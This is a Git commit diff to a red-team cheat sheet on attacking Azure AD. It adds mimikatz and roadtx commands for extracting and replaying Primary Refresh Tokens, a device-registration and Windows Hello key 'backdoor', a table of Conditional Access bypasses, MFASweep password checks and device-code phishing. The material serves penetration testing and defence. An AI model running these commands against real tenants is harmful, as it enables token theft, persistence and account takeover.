swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

AAD PRT + Conditional Access Policy

pull/1/head
Swissky 2023-11-20 23:20:18 +01:00
parent 24fe926630
commit 23b16ca0de
5 changed files with 58 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
assets/banner.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 2.2 MiB

After

Width:  |  Height:  |  Size: 1.2 MiB

26
docs/cloud/azure/azure-access-and-token.md
View File

@ -95,6 +95,16 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
``` ```
### Extract PRT v1
```ps1
mimikatz # sekurlsa::cloudap
mimikatz # sekurlsa::dpapi
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url https://portal.azure.com
```
### Extract PRT on Device with TPM ### Extract PRT on Device with TPM
* No method known to date. * No method known to date.
@ -103,11 +113,17 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
### Generate a PRT by registering a device ### Generate a PRT by registering a device
```ps1 ```ps1
roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg # Get correct token audience
roadtx device -n devicename roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem
roadtx prtenrich prt roadtx.prt # Registering device
roadtx prt -u user.lastname@domain.local -p password123 -key-pem devicename.key -cert-pem devicename.pem -r 0.AVAApQL<snip> roadtx device -a register -n <device-name>
# Request PRT
roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key
# Use a PRT
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
``` ```

17
docs/cloud/azure/azure-devices-users-services.md
View File

@ -25,7 +25,24 @@
### Join Devices ### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
### Register Devices ### Register Devices
```ps1
roadtx device -a register -n swkdeviceup
```
### Windows Hello for Business
```ps1
roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
# Service Principals # Service Principals

17
docs/cloud/azure/azure-enumeration.md
View File

@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
``` ```
## Azure AD - Conditionnal Access Policy ## Azure AD - Conditional Access Policy
Enumerate Conditionnal Access Policies: `roadrecon plugin policies` Conditional Access is used to restrict access to resources to compliant devices only.
* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
| CAP | Bypass |
|---------------------------|---------|
| Location / IP ranges | Corporate VPN, Guest Wifi |
| Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) |
| Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) |
| Azure AD Joined Device | Try to join a VM (Work Access)|
| Device requirement | / |
| MFA | / |
| Legacy Protocols | / |
| Compliant Device (Intune) | / |
| Domain Joined | / |
## Azure AD - MFA ## Azure AD - MFA
* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
```ps1 ```ps1
Import-Module .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
``` ```

5
docs/cloud/azure/azure-phishing.md
View File

@ -83,6 +83,11 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
## Device Code Phishing ## Device Code Phishing
* Using roadtool: `roadtx gettokens -u user@domain.lab --device-code` * Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
```ps1
roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource https://graph.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
```
* Using TokenTactics to request a token for Azure Graph API using a device code * Using TokenTactics to request a token for Azure Graph API using a device code
```ps1 ```ps1